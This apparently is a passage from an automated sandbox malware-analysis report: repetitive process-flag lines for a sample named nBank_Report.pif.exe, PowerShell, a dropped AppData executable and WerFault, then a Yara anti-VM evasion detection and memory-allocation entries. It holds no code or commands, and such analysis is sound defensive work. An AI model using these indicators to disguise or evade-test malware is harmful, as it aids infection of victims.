              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: nBank_Report.pif.exe PID: 7792, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: VtPPJdSqnkbmja.exe PID: 7100, type: MEMORYSTR
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeMemory allocated: 1510000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeMemory allocated: 2E90000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeMemory allocated: 4E90000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeMemory allocated: 8130000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeMemory allocated: 9130000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeMemory allocated: 92F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeMemory allocated: A2F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeMemory allocated: 2930000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeMemory allocated: 4A70000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeMemory allocated: 95A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeMemory allocated: A5A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeMemory allocated: 95A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeMemory allocated: 1350000 memory reserve | memory write watchJump to behavior
